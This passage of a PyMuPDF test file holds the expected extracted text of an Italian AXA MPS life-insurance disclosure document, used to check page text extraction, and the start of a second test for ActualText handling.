calcolato come prodotto tra il \nValore Unitario della Quota (rilevato in corrispondenza della data di scadenza) e il numero delle Quote attribuite al \nContratto alla medesima data.\nc) Prestazione in corso di Contratto\nPurché l\x00assicurato sia in vita, nel corso della durata del Contratto, il Fondo Interno mira alla corresponsione di due \nPrestazioni Periodiche. 
Le prestazioni saranno pari all\x00ammontare risultante dalla moltiplicazione tra il numero di Quote \nassegnate al Contratto il primo giorno Lavorativo della settimana successiva alla Data di Riferimento e 2,50% del \nValore Unitario della Quota registrato alla Data di istituzione del Fondo Interno.\nLe prestazioni verranno liquidate entro trenta giorni dalle Date di Riferimento.\nData di Riferimento\n 1° Prestazione Periodica\n24/04/2024\n 2° Prestazione Periodica\n23/04/2025\nLa corresponsione delle Prestazioni Periodiche non è collegata alla performance positiva o ai ricavi incassati dal Fondo \nInterno, pertanto, la corresponsione potrebbe comportare una riduzione del Controvalore delle Quote senza comportare \nalcuna riduzione del numero di Quote assegnate al Contratto.\nd) Prestazione assicurativa principale in caso di decesso dell'Assicurato\nIn caso di decesso dell\x00Assicurato nel corso della durata contrattuale, è previsto il pagamento ai Beneficiari di un \nimporto pari al Controvalore delle Quote attribuite al Contratto, calcolato come prodotto tra il Valore Unitario della \nQuota rilevato alla Data di Valorizzazione della settimana successiva alla data in cui la notifica di decesso \ndell\x00Assicurato perviene all\x00Impresa di Assicurazione e il numero delle Quote attribuite al Contratto alla medesima data, \nmaggiorato di una percentuale pari allo 0,1%.\nQualora il capitale così determinato fosse inferiore al Premio pagato, sarà liquidato un ulteriore importo pari alla \ndifferenza tra il Premio pagato, al netto della parte di Premio riferita a eventuali Riscatti parziali e l\x00importo caso morte \ncome sopra determinato. 
Tale importo non potrà essere in ogni caso superiore al 5% del Premio pagato.\nOpzioni contrattuali\nIl Contratto non prevede opzioni contrattuali.\nFondi Assicurativi\nLe prestazioni di cui sopra sono collegate, in base all\x00allocazione del premio come descritto alla sezione \x01Quando e \ncome devo pagare?\x02, al valore delle quote del Fondo Interno denominato PP27 Global Dividends.\nil Fondo interno mira al raggiungimento di un Obiettivo di Protezione del Valore Unitario di Quota, tramite il \nconseguimento di un Valore Unitario di Quota a scadenza almeno pari al 100% del valore di quota registrato alla Data \ndi istituzione dal Fondo Interno.\nIl regolamento di gestione del Fondo Interno è disponibile sul sito dell\x00Impresa di Assicurazione \nwww.axa-mpsfinancial.ie dove puo essere acquisito su supporto duraturo.\nDIP aggiuntivo IBIP - Progetto Protetto New - Global Dividends - Pag. 2 di 9\n",
'Che cosa NON è assicurato\nRischi esclusi\nIl rischio di decesso dell\x00Assicurato è coperto qualunque sia la causa, senza limiti territoriali e senza \ntenere conto dei cambiamenti di professione dell\x00Assicurato, ad eccezione dei seguenti casi:\n\x03 il decesso, entro i primi sette anni dalla data di decorrenza del Contratto, dovuto alla sindrome da \nimmunodeficienza acquisita (AIDS) o ad altra patologia ad essa associata;\n\x03 dolo del Contraente o del Beneficiario;\n\x03 partecipazione attiva dell\x00Assicurato a delitti dolosi;\n\x03 partecipazione dell\x00Assicurato a fatti di guerra, salvo che non derivi da obblighi verso lo Stato \nItaliano: in questo caso la garanzia può essere prestata su richiesta del Contraente, alle condizioni \nstabilite dal competente Ministero;\n\x03 incidente di volo, se l\x00Assicurato viaggia a bordo di un aeromobile non autorizzato al volo o con \npilota non titolare di brevetto idoneo e, in ogni caso, se viaggia in qualità di membro \ndell\x00equipaggio;\n\x03 suicidio, se avviene nei primi due anni dalla Data di Decorrenza del Contratto\nCi sono limiti di copertura?\nNon vi sono ulteriori informazioni rispetto al contenuto del KID.\nChe obblighi ho? 
Quali obblighi ha l\x00Impresa?\nCosa fare in caso \ndi evento?\nDenuncia\nCon riferimento alla liquidazione delle prestazioni dedotte in Contratto, il Contraente o, se del caso, \nil Beneficiario e il Referente Terzo, sono tenuti a recarsi presso la sede dell\x00intermediario presso il \nquale il Contratto è stato sottoscritto ovvero a inviare preventivamente, a mezzo di lettera \nraccomandata con avviso di ricevimento al seguente recapito:\n\x03 AXA MPS Financial DAC\n\x03 Wolfe Tone House, Wolfe Tone Street,\n\x03 Dublin, DO1 HP90 - Ireland\n\x03 Numero Verde: 800.231.187\n\x03 email: supporto@axa-mpsfinancial.ie\ni documenti di seguito elencati per ciascuna prestazione, al fine di consentire all\x00Impresa di \nAssicurazione di verificare l\x00effettiva esistenza dell\x00obbligo di pagamento.\nin caso di Riscatto totale, il Contraente deve inviare all\x00Impresa di Assicurazione:\n\x04 la richiesta di Riscatto totale firmata dal Contraente, indicando il conto corrente su cui il \npagamento deve essere effettuato. 
Nel caso il conto corrente sia intestato a persona diversa dal \nContraente o dai beneficiari o sia cointestato, il Contraente deve fornire anche I documenti del \ncointestatario e specificare la relazione con il terzo il cui conto viene indicato.\n\x04 copia di un valido documento di identità del Contraente o di un documento attestante i poteri di \nlegale rappresentante, nel caso in cui il Contraente sia una persona giuridica;\nin caso di Riscatto parziale, il Contraente deve inviare all\x00Impresa di Assicurazione:\n\x04 la richiesta di Riscatto parziale firmata dal Contraente, contenente l\x00indicazione dei Fondi \nInterni/OICR che intende riscattare e il relativo ammontare non ché l\x00indicazione del conto corrente \nbancario sul quale effettuare il pagamento;\n\x04 copia di un valido documento di identità del Contraente, o di un documento attestante i poteri di \nlegale rappresentante, nel caso in cui il Contraente sia una persona giuridica.\nIn caso di richiesta di Riscatto totale o parziale non corredata dalla sopra elencata documentazione, \nl\x00Impresa di Assicurazione effettuerà il disinvestimento delle Quote collegate al Contratto alla data \ndi ricezione della relativa richiesta. L\x00Impresa di Assicurazione provvederà tuttavia alla liquidazione \ndelle somme unicamente al momento di ricezione della documentazione mancante, prive degli \neventuali interessi che dovessero maturare;\nIn caso di decesso dell\x00Assicurato, il Beneficiario/i o il Referente Terzo deve inviare all\x00Impresa di \nAssicurazione:\nDIP aggiuntivo IBIP - Progetto Protetto New - Global Dividends - Pag. 3 di 9\n',
'\x04 la richiesta di pagamento sottoscritta da tutti i Beneficiari, con l\x00indicazione del conto corrente \nbancario sul quale effettuare il pagamento; Nel caso il conto corrente sia intestato a persona \ndiversa dal Contraente o dai beneficiari o sia cointestato, il Contraente deve fornire anche I \ndocumenti del cointestatario e specificare la relazione con il terzo il cui conto viene indicato.\n\x04 copia di un valido documento d\x00identità dei Beneficiari o di un documento attestante i poteri di \nlegale rappresentante, nel caso in cui il Beneficiario sia una persona giuridica;\n\x04 il certificato di morte dell\x00Assicurato;\n\x04 la relazione medica sulle cause del decesso;\n\x04 copia autenticata del testamento accompagnato da dichiarazione sostitutiva di atto di notorietà \ncon l\x00indicazione (i) della circostanza che il testamento è l\x00ultimo da considerarsi valido e non è \nstato impugnato e (ii) degli eredi testamentari, le relative età e capacità\ndi agire;\n\x04 in assenza di testamento, atto notorio (o dichiarazione sostitutiva di atto di notorietà) attestante \nche il decesso è avvenuto senza lasciare testamento e che non vi sono altri soggetti cui la legge \nriconosce diritti o quote di eredità;\n\x04 decreto del Giudice Tutelare nel caso di Beneficiari di minore età, con l\x00indicazione della persona \ndesignata alla riscossione;\n\x04 copia del Questionario KYC.\nPrescrizione: Alla data di redazione del presente documento, i diritti dei beneficiari dei contratti di \nassicurazione sulla vita si prescrivono nel termine di dieci anni dal giorno in cui si è verificato il fatto \nsu cui il diritto si fonda. 
Decorso tale termine e senza che la Compagnia abbia ricevuto alcuna \ncomunicazione e/o disposizione, gli importi derivanti dal contratto saranno devoluti al Fondo \ncostitutivo presso il Ministero dell\x00Economia e delle Finanze \x01depositi dormienti\x02.\nErogazione della prestazione\nL\x00Impresa di Assicurazione esegue il pagamento entro trenta giorni dal ricevimento della \ndocumentazione completa all\x00indirizzo sopra indicato.\n \nLe dichiarazioni del Contraente, e dell\x00Assicurato se diverso dal Contraente, devono essere esatte e \nveritiere. In caso di dichiarazioni inesatte o reticenti relative a circostanze tali che l\x00Impresa di \nAssicurazione non avrebbe dato il suo consenso, non lo avrebbe dato alle medesime condizioni se \navesse conosciuto il vero stato delle cose, l\x00Impresa di Assicurazione ha diritto a:\na) in caso di dolo o colpa grave:\n\x04 impugnare il Contratto dichiarando al Contraente di voler esercitare tale diritto entro tre mesi dal \ngiorno in cui ha conosciuto l\x00inesattezza della dichiarazione o le reticenze;\n\x04 trattenere il Premio relativo al periodo di assicurazione in corso al momento dell\x00impugnazione e, \nin ogni caso, il Premio corrispondente al primo anno;\n\x04 restituire, in caso di decesso dell\x00Assicurato, solo il Controvalore delle Quote acquisite al \nmomento del decesso, se l\x00evento si verifica prima che sia decorso il termine dianzi indicato per \nl\x00impugnazione;\nb) ove non sussista dolo o colpa grave:\n\x04 recedere dal Contratto, mediante dichiarazione da farsi al Contraente entro tre mesi dal giorno in \ncui ha conosciuto l\x00inesattezza della dichiarazione o le reticenze;\n\x04 se il decesso si verifica prima che l\x00inesattezza della dichiarazione o la reticenza sia conosciuta \ndall\x00Impresa di Assicurazione, o prima che l\x00Impresa abbia dichiarato di recedere dal Contratto, di \nridurre la somma dovuta in proporzione alla differenza tra il Premio convenuto e quello che sarebbe 
\nstato applicato se si fosse conosciuto il vero stato delle cose.\nIl Contraente è tenuto a inoltrare per iscritto alla Compagnia (posta ordinaria e mail) eventuali \ncomunicazioni inerenti:\n-modifiche dell\x00indirizzo presso il quale intende ricevere le comunicazioni relative al contratto;\n-variazione della residenza Europea nel corso della durata del contratto, presso altro Paese \nmembro della Unione Europea;\n-variazione degli estremi di conto corrente bancario.\nIn tal caso è necessario inoltrare la richiesta attraverso l\x00invio del modulo del mandato, compilato e \nsottoscritto dal contraente, reperibile nella sezione \x01comunicazioni\x02 sul sito internet della \ncompagnia all\x00indirizzo www.axa-mpsfinancial.ie\nFATCA (Foreign Account Tax Compliance Act) e CRS (Common Standard Reporting)\nLa normativa denominata rispettivamente FATCA (Foreign Account Tax Compliance Act - \nIntergovernmental Agreement sottoscritto tra Italia e Stati Uniti in data 10 gennaio 2014 e Legge n. \n95 del 18 giugno 2015) e CRS (Common Reporting Standard - Decreto Ministeriale del 28 \ndicembre 2015) impone agli operatori commerciali, al fine di contrastare la frode fiscale e \nl\x00evasione fiscale transfrontaliera, di eseguire la puntuale identificazione della propria clientela al \nfine di determinarne l\x00effettivo status di contribuente estero.\nDichiarazioni \ninesatte o \nreticenti\nDIP aggiuntivo IBIP - Progetto Protetto New - Global Dividends - Pag. 4 di 9\n',
"I dati anagrafici e patrimoniali dei Contraenti identificati come fiscalmente residenti negli USA e/o \nin uno o più Paesi aderenti al CRS, dovranno essere trasmessi all\x00autorità fiscale locale, tramite \nl\x00Agenzia delle Entrate.\nL\x00identificazione avviene in fase di stipula del contratto e deve essere ripetuta in caso di \ncambiamento delle condizioni originarie durante tutta la sua durata, mediante l\x00acquisizione di \nautocertificazione rilasciata dai Contraenti. Ogni contraente è tenuto a comunicare \ntempestivamente eventuali variazioni rispetto a quanto dichiarato o rilevato in fase di sottoscrizione \ndel contratto di assicurazione. La Società si riserva inoltre di verificare i dati raccolti e di richiedere \nulteriori informazioni. In caso di autocertificazione che risulti compilata parzialmente o in maniera \nerrata, nonché in caso di mancata/non corretta comunicazione dei propri dati anagrafici, la società \nqualora abbia rilevato indizi di americanità e/o residenze fiscali estere nelle informazioni in suo \npossesso, assocerà al cliente la condizione di contribuente estero, provvedendo alla comunicazione \ndovuta.\nAntiriciclaggio\nIl Contraente è tenuto a fornire alla Compagnia tutte le informazioni necessarie al fine \ndell\x00assolvimento dell\x00adeguata verifica ai fini antiriciclaggio. Qualora la Compagnia, in ragione \ndella mancata collaborazione del Contraente, non sia in grado di portare a compimento l\x00adeguata \nverifica, la stessa non potrà concludere il Contratto o dovrà porre fine allo stesso. In tali ipotesi le \nsomme dovute al Contraente dovranno essere allo stesso versate mediante bonifico a valere un \nconto corrente intestato al Contraente stesso. 
In tali ipotesi le disponibilità finanziarie \neventualmente già acquisite dalla Compagnia dovranno essere restituite al Contraente liquidando il \nrelativo importo tramite bonifico bancario su un conto corrente bancario indicato dal Contraente e \nallo stesso intestato.\nIn nessun caso l'Impresa di Assicurazione sarà tenuta a fornire alcuna copertura assicurativa, \nsoddisfare richieste di risarcimento o garantire alcuna indennità in virtù del presente contratto, \nqualora tale copertura, pagamento o indennità possa esporla a divieti, sanzioni economiche o \nrestrizioni ai sensi di Risoluzioni delle Nazioni Unite o sanzioni economiche o commerciali, leggi o \nnorme dell\x00Unione Europea, del Regno Unito o degli Stati Uniti d\x00America, ove applicabili in Italia.\nQuando e come devo pagare?\nPremio\nIl Contratto prevede il pagamento di un Premio Unico il cui ammontare minimo è pari a 2.500,00 \neuro, incrementabile di importo pari o in multiplo di 50,00 euro, da corrispondersi in un\x00unica \nsoluzione prima della conclusione del Contratto.\nNon è prevista la possibilità di effettuare versamenti aggiuntivi successivi.\nIl versamento del Premio Unico può essere effettuato mediante addebito su conto corrente \nbancario, indicato nel Modulo di Proposta, previa autorizzazione del titolare del conto corrente.\nIl pagamento dei Premio Unico può essere eseguito mediante addebito su conto corrente bancario, \nprevia autorizzazione, intestato al Contraente oppure tramite bonifico bancario sul conto corrente \ndell\x00Impresa di Assicurazione.\nRimborso\nIl rimborso del Premio Versato è previsto nel caso in cui il Contraente decida di revocare la proposta \nfinché il contratto non è concluso.\nSconti\nAl verificarsi di condizioni particolari ed eccezionali che potrebbero riguardare \x03 a titolo \nesemplificativo ma non esaustivo \x03 il Contraente e la relativa situazione assicurativo/finanziaria, \nl\x00ammontare del Premio pagato e gli investimenti selezionati dal 
Contraente, l\x00Impresa di \nAssicurazione si riserva la facoltà di applicare sconti sugli oneri previsti dal contratto, concordando \ntale agevolazione con il Contraente.\nQuando comincia la copertura e quando finisce?\nDurata\nIl Contratto ha una durata massima pari a 5 anni 11 mesi e 27 giorni, sino alla data di scadenza \n(11/04/2029, la \x01data di scadenza\x02).\nSospensione\nNon sono possibili delle sospensioni della copertura assicurativa\nDIP aggiuntivo IBIP - Progetto Protetto New - Global Dividends - Pag. 5 di 9\n",
'Come posso revocare la proposta, recedere dal contratto o risolvere il contratto? \nRevoca\nLa Proposta di assicurazione può essere revocata fino alle ore 24:00 del giorno in cui il Contratto è \nconcluso. In tal caso, l\x00Impresa di Assicurazione restituirà al Contraente il Premio pagato entro \ntrenta giorni dal ricevimento della comunicazione di Revoca.\nRecesso\nIl Contraente può recedere dal Contratto entro trenta giorni dalla sua conclusione. Il Recesso dovrà \nessere comunicato all\x00Impresa di Assicurazione mediante lettera raccomandata con avviso di \nricevimento.\nL\x00Impresa di Assicurazione, entro trenta giorni dal ricevimento della comunicazione relativa al \nRecesso, rimborserà al Contraente il Controvalore delle Quote attribuite al Contratto alla data di \nricevimento della richiesta di recesso incrementato dai caricamenti, ove previsti, e dedotte \neventuali agevolazioni.\nRisoluzione\nLa risoluzione del contratto è prevista tramite la richiesta di riscatto totale esercitabile in qualsiasi \nmomento della durata contrattuale\nSono previsti riscatti o riduzioni? Si\n no\nValori di\nriscatto e\nriduzione\nA condizione che siano trascorsi almeno 30 giorni dalla Data di Decorrenza (conclusione del \nContratto) e fino all\x00ultimo Giorno Lavorativo della terzultima settimana precedente la data di \nscadenza, il Contraente può riscuotere, interamente o parzialmente, il Valore di Riscatto. 
In caso di \nRiscatto totale, la liquidazione del Valore di Riscatto pone fine al Contratto con effetto dalla data di \nricezione della richiesta.\nL\x00importo che sarà corrisposto al Contraente in caso di Riscatto sarà pari al Controvalore delle \nQuote del Fondo Interno attribuite al Contratto alla data di Riscatto, al netto dei costi di Riscatto.\nIn caso di Riscatto, ai fini del calcolo del Valore Unitario della Quota, si farà riferimento alla Data di \nValorizzazione della settimana successiva alla data in cui la comunicazione di Riscatto del \nContraente perviene all\x00Impresa di Assicurazione, corredata di tutta la documentazione, al netto dei \ncosti di Riscatto, salvo il verificarsi di Eventi di Turbativa.\nIl Contraente assume il rischio connesso all\x00andamento negativo del valore delle Quote e, pertanto, \nesiste la possibilità di ricevere un ammontare inferiore all\x00investimento finanziario.\nIn caso di Riscatto del Contratto (totale o parziale), l\x00Impresa di Assicurazione non offre alcuna \ngaranzia finanziaria di rendimento minimo e pertanto il Contraente sopporta il rischio di ottenere un \nValore Unitario di Quota inferiore al 100% del Valore Unitario di Quota del Fondo Interno registrato \nalla Data di Istituzione in considerazione dei rischi connessi alla fluttuazione del valore di mercato \ndegli attivi in cui investe, direttamente o indirettamente, il Fondo Interno.\nRichiesta di\ninformazioni\nPer eventuali richieste di informazioni sul valore di riscatto, il Contraente può rivolgersi alla \nCompagnia AXA MPS Financial DAC \x03 Wolfe Tone House, Wolfe Tone Street, Dublin, DO1 HP90 \x03 \nIreland, Numero Verde 800.231.187, e-mail: supporto@axa-mpsfinancial.ie\nA chi è rivolto questo prodotto?\nL\x00investitore al dettaglio a cui è destinato il prodotto varia in funzione dell\x00opzione di investimento sottostante e \nillustrata nel relativo KID.\nIl prodotto è indirizzato a Contraenti persone fisiche e persone giuridiche a condizione 
che il Contraente (persona fisica) \ne l\x00Assicurato, al momento della sottoscrizione stessa, abbiano un\x00età compresa tra i 18 anni e i 85 anni.\nQuali costi devo sostenere?\nPer l\x00informativa dettagliata sui costi fare riferimento alle indicazioni del KID.\nIn aggiunta rispetto alle informazioni del KID , indicare i seguenti costi a carico del contraente.\nSpese di emissione:\nIl Contratto prevede una spesa fissa di emissione pari a 25 Euro.\nLa deduzione di tale importo avverrà contestualmente alla deduzione del premio.\nDIP aggiuntivo IBIP - Progetto Protetto New - Global Dividends - Pag. 6 di 9\n',
"L\x00obiettivo di protezione è da considerarsi al netto delle spese di emissione.\nCosti per riscatto\nIl Riscatto (totale e parziale) prevede un costo che varia in funzione della data di richiesta e secondo le percentuali di \nseguito indicate:\n1°Anno 5,00%; 2°Anno 3,50%; 3°Anno 2,00%; dal quarto anno in poi 0%;\nCosti di intermediazione\nla quota parte massima percepita dall\x00intermediario con riferimento all\x00intero flusso commissionale relativo al prodotto \nè pari al 35,17%.\nQuali sono i rischi e qual è il potenziale rendimento?\nSia con riferimento alla prestazione in caso di vita dell\x00assicurato, sia con riferimento al capitale caso morte riferito ai \nFondi Assicurativi Interni, la Compagnia non presta alcuna garanzia di rendimento minimo o di conservazione del \ncapitale. Pertanto il controvalore della prestazione della Compagnia potrebbe essere inferiore all\x00importo dei premi \nversati, in considerazione dei rischi connessi alla fluttuazione del valore di mercato degli attivi in cui investe, \ndirettamente o indirettamente il Fondo Interno.\nCOME POSSO PRESENTARE I RECLAMI E RISOLVERE LE CONTROVERSIE?\nAll\x00IVASS\nNel caso in cui il reclamo presentato all\x00impesa assicuratrice abbia esito insoddisfacente o risposta \ntardiva, è possibile rivolgersi all\x00IVASS, Via del Quirinale, 21 - 00187 Roma, fax 06.42133206, Info \nsu: www.ivass.it.\nEventuali reclami potranno inoltre essere indirizzati all\x00Autorità Irlandese competente al seguente \nindirizzo:\nFinancial Services Ombudsman 3rd Floor, Lincoln House, Lincoln Place, Dublin 2, D02 VH29 \x03 \nIreland\nPRIMA DI RICORRERE ALL\x00AUTORITÀ GIUDIZIARIA è possibile, in alcuni casi necessario, \navvalersi di sistemi alternativi di risoluzione delle controversie, quali:\nMediazione\nInterpellando un Organismo di Mediazione tra quelli presenti nell'elenco del Ministero della \nGiustizia, consultabile sul sito www.giustizia.it (Legge 9/8/2013, n.98)\nNegoziazione \nassistita\nTramite 
richiesta del proprio avvocato all\x00impresa\nAltri Sistemi \nalternative di \nrisoluzione delle \ncontroversie\nEventuali reclami relativi ad un contratto o servizio assicurativo nei confronti dell'Impresa di \nassicurazione o dell'Intermediario assicurativo con cui si entra in contatto, nonché qualsiasi \nrichiesta di informazioni, devono essere preliminarmente presentati per iscritto (posta, email) ad \nAXA MPS Financial DAC - Ufficio Reclami secondo seguenti modalità:\nEmail: reclami@axa-mpsfinancial.ie\nPosta: AXA MPS Financial DAC - Ufficio Reclami\nWolfe Tone House, Wolfe Tone Street,\nDublin DO1 HP90 - Ireland\nNumero Verde 800.231.187\navendo cura di indicare:\n-nome, cognome, indirizzo completo e recapito telefonico del reclamante;\n-numero della polizza e nominativo del contraente;\n-breve ed esaustiva descrizione del motivo di lamentela;\n-ogni altra indicazione e documento utile per descrivere le circostanze.\nSarà cura della Compagnia fornire risposta entro 45 giorni dalla data di ricevimento del reclamo, \ncome previsto dalla normativa vigente.\nNel caso di mancato o parziale accoglimento del reclamo, nella risposta verrà fornita una chiara \nspiegazione della posizione assunta dalla Compagnia in relazione al reclamo stesso ovvero della \nsua mancata risposta.\nQualora il reclamante non abbia ricevuto risposta oppure ritenga la stessa non soddisfacente, \nprima di rivolgersi all'Autorità Giudiziaria, può scrivere all'IVASS (Via del Quirinale, 21 - 00187 \nRoma; fax 06.42.133.745 o 06.42.133.353, ivass@pec.ivass.it) fornendo copia del reclamo già \nDIP aggiuntivo IBIP - Progetto Protetto New - Global Dividends - Pag. 7 di 9\n",
"inoltrato all'impresa ed il relativo riscontro anche utilizzando il modello presente nel sito dell'IVASS \nalla sezione per il Consumatore - come presentare un reclamo.\nEventuali reclami potranno inoltre essere indirizzati all'Autorità Irlandese competente al seguente \nindirizzo:\nFinancial Services Ombudsman\n3rd Floor, Lincoln House,\nLincoln Place, Dublin 2, D02 VH29 Ireland\nIl reclamante può ricorrere ai sistemi alternativi per la risoluzione delle controversie previsti a livello \nnormativo o convenzionale, quali:\n\x04 Mediazione: (Decreto Legislativo n.28/2010 e ss.mm.) puo' essere avviata presentando istanza \nad un Organismo di Mediazione tra quelle presenti nell'elenco del Ministero della Giustizia, \nconsultabile sul sito www.giustizia.it. La legge ne prevede l'obbligatorieta' nel caso in cui si intenda \nesercitare in giudizio i propri diritti in materia di contratti assicurativi o finanziari e di risarcimento \nda responsabilita' medica e sanitaria, costituendo condizione di procedibilita' della domanda.\n\x04 Negoziazione Assistita: (Legge n.162/2014) tramite richiesta del proprio Avvocato all'Impresa. E' \nun accordo mediante il quale le parti convengono di cooperare in buona fede e con lealta' per \nrisolvere in via amichevole la controversia tramite l'assistenza di avvocati. Fine del procedimento e' \nla composizione bonaria della lite, con la sottoscrizione delle parti - assistite dai rispettivi difensori - \ndi un accordo detto convenzione di negoziazione. Viene prevista la sua obbligatorieta' nel caso in \ncui si intenda esercitare in giudizio i propri diritti per ogni controversia in materia di risarcimento del \ndanno da circolazione di veicoli e natanti, ovverosia e' condizione di procedibilita' per l'eventuale \ngiudizio civile. 
Invece e' facoltativa per ogni altra controversia in materia di risarcimenti o di contratti \nassicurativi o finanziari.\nIn caso di controversia relativa alla determinazione dei danni si puo' ricorrere alla perizia \ncontrattuale prevista dalle Condizioni di Assicurazione per la risoluzione di tale tipologia di \ncontroversie. L'istanza di attivazione della perizia contrattuale dovra' essere indirizzata alla \nCompagnia all' indirizzo\nAXA MPS Financial DAC \nWolfe Tone House, Wolfe Tone Street\nDublin DO1 HP90 - Ireland\nPer maggiori informazioni si rimanda a quanto presente nell'area Reclami del sito \nwww.axa-mpsfinancial.ie. \nPer la risoluzione delle liti transfrontaliere è possibile presentare reclamo all'IVASS o direttamente \nal sistema estero http://ec.europa.eu/internal_market/fin-net/members_en.htm competente \nchiedendo l'attivazione della procedura FIN-NET.\nEventuali reclami relativi la mancata osservanza da parte della Compagnia, degli intermediari e dei \nperiti assicurativi, delle disposizioni del Codice delle assicurazioni, delle relative norme di \nattuazione nonché delle norme sulla commercializzazione a distanza dei prodotti assicurativi \npossono essere presentati direttamente all'IVASS, secondo le modalità sopra indicate.\nSi ricorda che resta salva la facoltà di adire l'autorità giudiziaria.\nREGIME FISCALE\nTrattamento \nfiscale applicabile \nal contratto\nLe seguenti informazioni sintetizzano alcuni aspetti del regime fiscale applicabile al Contratto, ai \nsensi della legislazione tributaria italiana e della prassi vigente alla data di pubblicazione del \npresente documento, fermo restando che le stesse rimangono soggette a possibili cambiamenti che \npotrebbero avere altresì effetti retroattivi. Quanto segue non intende rappresentare un\x00analisi \nesauriente di tutte le conseguenze fiscali del Contratto. 
I Contraenti sono tenuti a consultare i loro \nconsulenti in merito al regime fiscale proprio del Contratto.\nTasse e imposte\nLe imposte e tasse presenti e future applicabili per legge al Contratto sono a carico del Contraente \no dei Beneficiari e aventi diritto e non è prevista la corresponsione al Contraente di alcuna somma \naggiuntiva volta a compensare eventuali riduzioni dei pagamenti relativi al Contratto.\nTassazione delle somme corrisposte a soggetti non esercenti attività d\x00impresa\n1. In caso di decesso dell\x00Assicurato\nLe somme corrisposte dall\x00Impresa di Assicurazione in caso di decesso dell\x00Assicurato non sono \nsoggette a tassazione IRPEF in capo al percettore e sono esenti dall\x00imposta sulle successioni. Si \nricorda tuttavia che, per effetto della legge 23 dicembre 2014 n. 190 (c.d.\x02Legge di Stabilità\x02), i \nDIP aggiuntivo IBIP - Progetto Protetto New - Global Dividends - Pag. 8 di 9\n",
'capitali percepiti in caso di morte, a decorrere dal 1 gennaio 2015, in dipendenza di contratti di \nassicurazione sulla vita, a copertura del rischio demografico, sono esenti dall\x00imposta sul reddito \ndelle persone fisiche.\n2. In caso di Riscatto totale o di Riscatto parziale.\nLe somme corrisposte dall\x05Impresa di Assicurazione in caso di Riscatto totale sono soggette ad \nun\x00imposta sostitutiva dell\x00imposta sui redditi nella misura prevista di volta in volta dalla legge. Tale \nimposta, al momento della redazione del presente documento, è pari al 26% sulla differenza \n(plusvalenza) tra il capitale maturato e l\x00ammontare dei premi versati (al netto di eventuali riscatti \nparziali), con l\x00eccezione dei proventi riferibili ai titoli di stato italiani ed equiparati (Paesi facenti \nparte della white list), per i quali l\x00imposta è pari al 12,5%.\nIn caso di Riscatto parziale, ai fini del computo del reddito di capitale da assoggettare alla predetta \nimposta sostitutiva, l\x00ammontare dei premi va rettificato in funzione del rapporto tra il capitale \nerogato ed il valore economico della polizza alla data del Riscatto parziale.\n3. In caso di Recesso\nLe somme corrisposte in caso di Recesso sono soggette all\x00imposta sostitutiva delle imposte sui \nredditi nella misura e con gli stessi criteri indicati per il Riscatto totale del Contratto.\nTassazione delle somme corrisposte a soggetti esercenti attività d\x00impresa\nLe somme corrisposte a soggetti che esercitano l\x00attività d\x00impresa non costituiscono redditi di \ncapitale, bensì redditi d\x00impresa. Su tali somme l\x00Impresa non applica l\x00imposta sostitutiva di cui \nall\x00art. 26-ter del D.P.R. 29 settembre 1973, n. 
600.\nSe le somme sono corrisposte a persone fisiche o enti non commerciali in relazione a contratti \nstipulati nell\x00ambito dell\x00attività commerciale, l\x00Impresa non applica l\x00imposta sostitutiva, qualora gli \ninteressati presentino una dichiarazione in merito alla sussistenza di tale requisito.\nL\x00IMPRESA HA L\x00OBBLIGO DI TRASMETTERTI, ENTRO IL 31 MAGGIO DI OGNI ANNO, IL DOCUMENTO \nUNICO DI RENDICONTAZIONE ANNUALE DELLA TUA POSIZIONE ASSICURATIVA\nPER QUESTO CONTRATTO L\x00IMPRESA NON DISPONE DI UN\x00AREA INTERNET DISPOSITIVA RISERVATA \nAL CONTRAENTE (c.d. HOME INSURANCE), PERTANTO DOPO LA SOTTOSCRIZIONE NON POTRAI \nGESTIRE TELEMATICAMENTE IL CONTRATTO MEDESIMO.\nDIP aggiuntivo IBIP - Progetto Protetto New - Global Dividends - Pag. 9 di 9\n',
]
path = os.path.abspath(f'{__file__}/../../tests/resources/test_3186.pdf')
fitz_doc = pymupdf.open(path)
texts = list()
for page in fitz_doc:
t = page.get_text()
texts.append(t)
assert texts == texts_expected, f'Unexpected output: {texts=}'
def test_3197():
    '''
    MuPDF's ActualText support fixes handling of test_3197.pdf.

    With MuPDF >= 1.24 the extracted page text must match the expected UTF-8
    bytes exactly; with older MuPDF (no ActualText support) it must differ.
    '''
    if pymupdf.mupdf_version_tuple < (1, 24):
        print(f'Not running on {pymupdf.mupdf_version_tuple=}.')
        return
    path = os.path.abspath(f'{__file__}/../../tests/resources/test_3197.pdf')
    # Expected UTF-8 encoded text of each page, in page order.
    text_utf8_expected = [
        b'NYSE - Nasdaq Real Time Price \xe2\x80\xa2 USD\nFord Motor Company (F)\n12.14 -0.11 (-0.90%)\nAt close: 4:00 PM EST\nAfter hours: 7:43 PM EST\nAll numbers in thousands\nAnnual\nQuarterly\nDownload\nSummary\nNews\nChart\nConversations\nStatistics\nHistorical Data\nProfile\nFinancials\nAnalysis\nOptions\nHolders\nSustainability\nInsights\nFollow\n12.15 +0.01 (+0.08%)\nIncome Statement\nBalance Sheet\nCash Flow\nSearch for news, symbols or companies\nNews\nFinance\nSports\nSign in\nMy Portfolio\nNews\nMarkets\nSectors\nScreeners\nPersonal Finance\nVideos\nFinance Plus\nBack to classic\nMore\n',
